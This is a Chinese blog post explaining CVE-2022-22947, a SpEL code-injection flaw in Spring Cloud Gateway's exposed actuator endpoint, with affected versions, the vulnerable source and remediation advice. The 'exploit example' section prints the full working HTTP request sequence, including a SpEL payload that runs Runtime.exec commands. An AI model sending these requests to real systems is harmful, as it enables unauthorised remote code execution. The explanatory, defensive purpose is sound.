spring cloud gateway暴漏actuator/gateway造成的漏洞

已于 2024-11-07 18:04:55 修改
阅读量1.6k 收藏 16
点赞数 22
分类专栏: spring boot 文章标签: gateway spring boot
于 2024-11-07 18:01:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43966710/article/details/143603427
版权

引言

VMware官方发布了一则安全通告,披露了Spring Cloud Gateway中存在一个高危的代码注入漏洞,漏洞编号为CVE-2022-22947。该漏洞允许远程攻击者通过发送恶意请求,在启用和暴露不安全的Gateway Actuator端点时,执行任意代码,甚至获取系统权限。本文将详细解析这一漏洞,并提供相应的修复建议。

漏洞描述

Spring Cloud Gateway是一个基于Spring Framework和Spring Boot构建的API网关,旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。然而,当应用程序使用Spring Cloud Gateway并对外暴露了Gateway Actuator端点时,就可能存在被CVE-2022-22947漏洞利用的风险。

攻击者可以通过发送特制的恶意请求,利用此漏洞执行SpEL(Spring Expression Language)表达式,从而在远程主机上执行任意代码。这一漏洞的利用过程通常涉及以下几个步骤:

  • 发送恶意请求:攻击者通过HTTP请求向目标系统的Actuator/Gateway端点发送恶意构造的路由配置。
  • 执行SpEL表达式:在路由配置中嵌入SpEL表达式,该表达式在解析时会执行任意代码。
  • 刷新路由配置:通过发送刷新请求,使恶意路由配置生效。
  • 获取执行结果:通过访问特定的路由,获取恶意代码的执行结果。
影响范围

该漏洞影响以下版本的Spring Cloud Gateway:

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
其他旧的、不再受支持的版本
此外,受影响的应用程序还需要使用Spring Boot Actuator组件,该组件用于对外提供/actuator/接口。

漏洞利用示例
以下是一个简单的漏洞利用示例,展示了如何通过发送恶意请求来执行系统命令:

  • 发送恶意路由配置:
http
POST /actuator/gateway/routes/{id} HTTP/1.1
Host: xx.xx.xx.xx:xx
Content-Type: application/json
 
{
  "id": "hacktest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
      }
    }
  ],
  "uri": "http://example.com"
}
  • 刷新路由配置:
http
POST /actuator/gateway/refresh HTTP/1.1
Host: xx.xx.xx.xx:xx
  • 获取执行结果:
http
GET /actuator/gateway/routes/{id} HTTP/1.1
Host: xx.xx.xx.xx:xx
  • 删除恶意路由配置(可选):
http
DELETE /actuator/gateway/routes/{id} HTTP/1.1
Host: xx.xx.xx.xx:xx
POST /actuator/gateway/refresh HTTP/1.1
Host: xx.xx.xx.xx:xx

源码

AbstractGatewayControllerEndpoint

public class AbstractGatewayControllerEndpoint implements ApplicationEventPublisherAware {

	private static final Log log = LogFactory.getLog(GatewayControllerEndpoint.class);

	protected RouteDefinitionLocator routeDefinitionLocator;

	protected List<GlobalFilter> globalFilters;

	// TODO change casing in next major release
	protected List<GatewayFilterFactory> GatewayFilters;

	protected List<RoutePredicateFactory> routePredicates;

	protected RouteDefinitionWriter routeDefinitionWriter;

	protected RouteLocator routeLocator;

	protected ApplicationEventPublisher publisher;

	public AbstractGatewayControllerEndpoint(RouteDefinitionLocator routeDefinitionLocator,
			List<GlobalFilter> globalFilters, List<GatewayFilterFactory> gatewayFilters,
			List<RoutePredicateFactory> routePredicates, RouteDefinitionWriter routeDefinitionWriter,
			RouteLocator routeLocator) {
		this.routeDefinitionLocator = routeDefinitionLocator;
		this.globalFilters = globalFilters;
		this.GatewayFilters = gatewayFilters;
		this.routePredicates = routePredicates;
		this.routeDefinitionWriter = routeDefinitionWriter;
		this.routeLocator = routeLocator;
	}

	@Override
	public void setApplicationEventPublisher(ApplicationEventPublisher publisher) {
		this.publisher = publisher;
	}

	// TODO: Add uncommited or new but not active routes endpoint

	@PostMapping("/refresh")
	public Mono<Void> refresh() {
		this.publisher.publishEvent(new RefreshRoutesEvent(this));
		return Mono.empty();
	}

	@GetMapping("/globalfilters")
	public Mono<HashMap<String, Object>> globalfilters() {
		return getNamesToOrders(this.globalFilters);
	}

	@GetMapping("/routefilters")
	public Mono<HashMap<String, Object>> routefilers() {
		return getNamesToOrders(this.GatewayFilters);
	}

	@GetMapping("/routepredicates")
	public Mono<HashMap<String, Object>> routepredicates() {
		return getNamesToOrders(this.routePredicates);
	}

	private <T> Mono<HashMap<String, Object>> getNamesToOrders(List<T> list) {
		return Flux.fromIterable(list).reduce(new HashMap<>(), this::putItem);
	}

	private HashMap<String, Object> putItem(HashMap<String, Object> map, Object o) {
		Integer order = null;
		if (o instanceof Ordered) {
			order = ((Ordered) o).getOrder();
		}
		// filters.put(o.getClass().getName(), order);
		map.put(o.toString(), order);
		return map;
	}

	/*
	 * http POST :8080/admin/gateway/routes/apiaddreqhead uri=http://httpbin.org:80
	 * predicates:='["Host=**.apiaddrequestheader.org", "Path=/headers"]'
	 * filters:='["AddRequestHeader=X-Request-ApiFoo, ApiBar"]'
	 */
	@PostMapping("/routes/{id}")
	@SuppressWarnings("unchecked")
	public Mono<ResponseEntity<Object>> save(@PathVariable String id, @RequestBody RouteDefinition route) {

		return Mono.just(route).filter(this::validateRouteDefinition)
				.flatMap(routeDefinition -> this.routeDefinitionWriter.save(Mono.just(routeDefinition).map(r -> {
					r.setId(id);
					log.debug("Saving route: " + route);
					return r;
				})).then(Mono.defer(() -> Mono.just(ResponseEntity.created(URI.create("/routes/" + id)).build()))))
				.switchIfEmpty(Mono.defer(() -> Mono.just(ResponseEntity.badRequest().build())));
	}

	private boolean validateRouteDefinition(RouteDefinition routeDefinition) {
		boolean hasValidFilterDefinitions = routeDefinition.getFilters().stream()
				.allMatch(filterDefinition -> GatewayFilters.stream().anyMatch(
						gatewayFilterFactory -> filterDefinition.getName().equals(gatewayFilterFactory.name())));

		boolean hasValidPredicateDefinitions = routeDefinition.getPredicates().stream()
				.allMatch(predicateDefinition -> routePredicates.stream()
						.anyMatch(routePredicate -> predicateDefinition.getName().equals(routePredicate.name())));
		log.debug("FilterDefinitions valid: " + hasValidFilterDefinitions);
		log.debug("PredicateDefinitions valid: " + hasValidPredicateDefinitions);
		return hasValidFilterDefinitions && hasValidPredicateDefinitions;
	}

	@DeleteMapping("/routes/{id}")
	public Mono<ResponseEntity<Object>> delete(@PathVariable String id) {
		return this.routeDefinitionWriter.delete(Mono.just(id))
				.then(Mono.defer(() -> Mono.just(ResponseEntity.ok().build())))
				.onErrorResume(t -> t instanceof NotFoundException, t -> Mono.just(ResponseEntity.notFound().build()));
	}

	@GetMapping("/routes/{id}/combinedfilters")
	public Mono<HashMap<String, Object>> combinedfilters(@PathVariable String id) {
		// TODO: missing global filters
		return this.routeLocator.getRoutes().filter(route -> route.getId().equals(id)).reduce(new HashMap<>(),
				this::putItem);
	}

修复建议

为了修复这一漏洞,建议采取以下措施:

升级到安全版本:

对于Spring Cloud Gateway 3.1.x用户,应升级到3.1.1或更高版本。
对于Spring Cloud Gateway 3.0.x用户,应升级到3.0.7或更高版本。

禁用Gateway Actuator端点:

如果不需要Gateway Actuator端点,可以通过配置management.endpoint.gateway.enabled=false来禁用它。
使用Spring Security保护Actuator端点:
如果需要保留Actuator端点,应使用Spring Security对其进行保护,具体可参考Spring Boot官方文档。

结论

CVE-2022-22947漏洞是一个高危的代码注入漏洞,允许远程攻击者通过发送恶意请求在启用和暴露不安全的Gateway Actuator端点时执行任意代码。为了保障系统的安全性,建议受影响的用户尽快升级到安全版本的Spring Cloud Gateway,并采取相应的防护措施。同时,也应加强系统的安全监控和日志审计,以便及时发现和应对潜在的安全威胁。

Spring Cloud Gateway 监控、多网关实例路由共享 | Spring Cloud 18
gmHappy
03-11 6129
ActuatorSpring Boot提供的用来对应用系统进行监控的功能模块,借助于Actuator开发者可以很方便地对应用系统某些监控指标进行查看、统计等。 Actuator的核心是端点Endpoint。 Endpoint可以让我们监视应用程序并与其交互。Spring Boot包含许多内置端点,并允许您添加自己的端点。 我们可以启用或禁用每个端点,启用或禁用端点控制是否创建端点并且其bean存在于应用程序上下文中。 要进行远程访问,还必须通过JMX或HTTP公开端点。大多数端点HTTP访问默认是关闭的。
【网络安全】漏洞挖掘之Spring Cloud注入漏洞
wlaq_juju的博客
07-05 1373
springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
源码分析之Spring Cloud Gatewayactuator是如何工作的?
evasnowind的专栏
01-22 938
本文目标 预计介绍如下内容: 在SCG中如何使用actuator? SCG中的actuator能做什么? 在代码层面上,SCG如何实现actuator? 如何基于SCG的actuator进行监控? 1、在SCG中如何使用actuator? 参见 https://docs.spring.io/spring-cloud-gateway/docs/2.2.5.RELEASE/reference/html/#actuator-api 只需要在配置中开启如下配置(以properties配置方式为例,YAML方式属
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
weixin_55885866的博客
01-16 999
Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2"args": {}],201表示创建成功POST /actuator/gateway/refresh HTTP/1.1Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2。
Spring Cloud Gateway 远程代码执⾏漏洞(CVE-2022-22947)修复方案
最新发布
AoiMukou01的博客
03-21 778
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API ⽹关,它旨在为微服务架构提供⼀种简单有效的统⼀的 API 路由管理⽅式。用curl分别发送三个数据包 其中第一个数据包的\"id\":\"whoami\"处whoami为执行的命令。用curl分别发送三个数据包 其中第一个数据包的\"id\":\"whoami\"处whoami为执行的命令。-- 易受攻击的版本 -->-- 安全版本 -->3.1工具POC检测。
Spring Cloud Getway RCE漏洞
qq_73630656的博客
06-12 1260
Spring Cloud Gateway 启用和Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
热门推荐
chaojixiaojingang
03-08 1万+
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意...
Spring-Cloud-Gateway之代码注入漏洞及解决
qq_34905631的博客
09-27 9436
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码
突发!Spring Cloud 再爆高危漏洞。。赶紧修复!!
AI研习社
03-03 683
开发者(KaiFaX)面向全栈工程师的开发者专注于前端、Java/Python/Go/PHP的技术社区Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring ...
Spring Cloud Gateway集成Actuator、prometheus监控方案以及相关安全漏洞的解决方案
IT_huge的博客
08-26 837
Spring Cloud Gateway集成Actuator、prometheus监控方案以及相关安全漏洞的解决方案
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3452
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
1. **识别易受攻击的端点**:查找Spring Cloud Gateway Actuator API 中开放的,且可能接受SpEL表达式的端点,如`/actuator/gateway/routes`或`/actuator/env`。 2. **构造恶意请求**:创建一个HTTP请求,其请求体...
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)
日常技术分享
10-16 7434
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)
Spring Cloud 再爆高危漏洞.... 赶紧修复
终码一生
03-07 5204
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X 问题描述: Spring Cloud GatewaySpring Cloud .
SpringCloud Gateway 远程代码执行漏洞
qq_33240556的博客
06-18 779
Spring Cloud Gateway(SCG)本身并没有远程代码执行漏洞,但是,如果你在配置过程中使用了不安全的代码或者依赖,可能会引入安全风险。:类似地,如果过滤器配置中的某些参数来自用户输入,且没有进行充分验证和过滤,也可能会被利用来执行远程代码。在使用自定义过滤器时,要确保传入过滤器的参数是安全的。:SCG依赖的其他库或组件可能存在安全漏洞,攻击者可以利用这些漏洞来执行远程代码。字段来自用户输入,且没有进行严格的验证和过滤,可能会被攻击者利用来执行远程代码。,就需要格外注意输入的合法性。
突发!Spring Cloud 爆高危漏洞。。赶紧修复!
良月柒
03-12 286
程序员的成长之路互联网/程序员/技术/资料共享关注阅读本文大概需要 2.8 分钟。来自:网络Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring Clou...
Spring Cloud Gateway集成Actuator的安全漏洞和解决方案
白云
04-18 4253
最近线上环境出现一起安全事件,就是由于Spring Cloud Gateway集成Actuator导致被攻击,攻击者通过动态添加路由规则,导致系统出现异常。下面将详细介绍这一事件。Spring Cloud Gateway集成Actuator后可以提供更多的监控和管理功能,但也增加了安全风险。在使用过程中,需要注意限制访问权限和动态路由规则的范围,以避免类似的攻击事件发生。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值